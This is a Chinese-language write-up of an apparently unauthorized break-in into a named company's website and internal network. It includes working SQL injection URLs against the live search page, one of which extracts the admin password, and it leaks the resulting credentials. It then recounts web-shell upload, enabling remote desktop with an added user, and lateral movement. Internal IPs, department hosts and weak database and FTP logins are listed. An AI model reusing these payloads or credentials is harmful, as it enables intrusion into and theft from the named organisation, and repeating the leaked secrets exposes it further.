一个被忽略的SQL注射漏洞
http://fc.tcl.com/cn/search.aspx?k=1';select%20*%20from%20sysobjects%20where%20@@version%3E0;--
测试其它工具均失效,就穿山甲成功了。但是暴数据的时候穿山甲又挂了
无所谓,自己搞了试试吧。
http://fc.tcl.com/cn/search.aspx?k=1';select top 1 password from AdminUsers where password>0;--
最后获取到后台的账号密码:Admin/0101。
后台拿shell:
在可上传附件的地方上传了,然后在前台找文章,就知道附件路径了:
Shell到手。找了下sa的密码,然后各种转发啊,抓用户密码啊,就不提了,虽然有3哥。
服务器上也发现了前辈的足迹。
为了避免“干扰”,删除了几个已经“遗留”的小shell,和对upload文件夹进行了一下限制(其实有sa,这些都是浮云,懒得改sa了):
下面讲进入内网获取到的信息
先看看和WEB服务器同段内有什么主机,以下是相关信息:
\\DATA 10.0.16.42
\\PRINTERS10.0.16.8
\\WWW 10.0.16.10
\\公司客户部10.0.16.18
\\共享服务器10.0.16.31
\\征信系统10.0.16.33
\\扫描 10.0.16.45
\\现金管理部10.0.16.12
\\计划财务部 10.0.16.11
\\金融机构部10.0.16.13
\\风险管理部 HP-1008MFP Server 10.0.16.15
再扫描了一下:
查看下ie的历史记录:
东西还是不少的
10.0.16.31的administrator账户没有密码可以直接做点坏事:
开启3389,添加用户,登录成功:
10.0.0.65集团财务预警分析系统
报表系统用户名密码相同
.40这台机器还存在mssql sa/123456的弱口令,FTP 也存在弱口令。
84为匿名FTP
10.92.2.30 mssql Sa/sa
域控服务器?不知道干啥用的哦
内网的杀毒软件就是摆设一样:
10.92.2.7存在mysql的弱口令 root/空密码
10.92.3.70的FTP弱口令:
10.120.99.x网段:
大部分PUT不了。也做一个提醒。
还有匿名FTP自行发现。
10.92.8.x网段
不看了……
另外好多台都是打印机啊……
比如http://10.0.16.11
http://10.0.16.16
http://10.0.16.21 等。
10.0.16.16存在匿名ftp
10.0.16.18有FTP弱口令Admin/admin
10.0.16.22存在匿名ftp
很多机器都有IPC空会话………………
大概意思就是这样。